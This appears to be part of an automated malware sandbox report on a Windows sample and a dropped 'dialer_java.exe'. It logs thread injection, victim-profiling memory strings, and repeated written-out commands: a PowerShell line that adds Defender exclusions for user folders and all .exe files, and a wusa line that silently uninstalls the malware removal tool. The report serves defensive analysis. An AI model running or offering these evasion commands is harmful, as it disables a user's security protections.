Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779851160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	91_2_00007FF779851160

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Thread register set: target process: 7544

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: conhost.exe, 0000001B.00000002.3547859630.000002B353C05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \| C:\\Windows\\explorer.exe"}plorer.exer.exes
Source: conhost.exe, 0000001B.00000002.3547859630.000002B353C05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \| C:\\Windows\\explorer.exe"}
Source: conhost.exe, 0000001B.00000002.3547859630.000002B353C05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager \| C:\Windows\explorer.exe
Source: conhost.exe, 0000001B.00000002.3547859630.000002B353C05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3.4.3","vram":"0","windowTitle":"Program Manager \| C:\\Windows\\explorerl

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
